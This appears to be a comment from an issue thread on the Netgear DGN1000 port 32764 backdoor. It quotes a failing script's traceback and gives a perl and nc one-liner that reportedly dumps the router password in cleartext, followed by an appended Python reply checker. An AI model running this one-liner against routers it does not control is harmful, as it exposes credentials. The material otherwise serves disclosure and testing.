DGN1000 #3

@grigio

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway, with a DGN1000 Netgear N150 and the script below, I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764

I also tried over the internet (with or without remote administration enabled) and it doesn't work, so it seems to be just a local LAN exploit.
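The `struct.error` in the traceback is raised when `s.recv(0xC)` hands back fewer than 12 bytes. The following is an added example, not part of the original post or the project's script: it reads the 12-byte header without assuming one `recv` returns all of it, then classifies a captured reply when checking a device on your own LAN. The names `recv_exact` and `classify_header`, the verdict strings and the byte-swapped case are assumptions; the signature constant and field names come from the post.

```python
import socket
import struct

SIGNATURE = 0x53634D4D   # constant from the perl one-liner in the post
HEADER_LEN = 0xC         # 12 bytes: sig, ret_val, ret_len (names from the traceback)


def recv_exact(sock, n):
    """Read exactly n bytes; return what arrived if the peer closes early."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:          # peer closed the connection
            break
        buf += chunk
    return buf


def classify_header(buf):
    """Return (verdict, fields) for a captured reply header."""
    if len(buf) == 0:
        return "no-reply", None
    if len(buf) < HEADER_LEN:
        return "short-reply", None   # the case that raised struct.error
    sig, ret_val, ret_len = struct.unpack("<III", buf[:HEADER_LEN])
    if sig == SIGNATURE:
        return "match-little-endian", (ret_val, ret_len)
    # Assumption: same constant in the opposite byte order, so decode big-endian.
    if sig == struct.unpack("<I", struct.pack(">I", SIGNATURE))[0]:
        _, ret_val, ret_len = struct.unpack(">III", buf[:HEADER_LEN])
        return "match-big-endian", (ret_val, ret_len)
    return "other-service", None


def demo():
    """Constructed input: a 12-byte header delivered in two separate writes."""
    a, b = socket.socketpair()
    try:
        header = struct.pack("<III", SIGNATURE, 0, 5)
        a.sendall(header[:7])
        a.sendall(header[7:])
        a.close()
        return classify_header(recv_exact(b, HEADER_LEN))
    finally:
        b.close()


if __name__ == "__main__":
    print(demo())
```

A `no-reply` or `short-reply` verdict corresponds to the condition behind the traceback; `other-service` means something answered on the port with a different 12-byte prefix.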
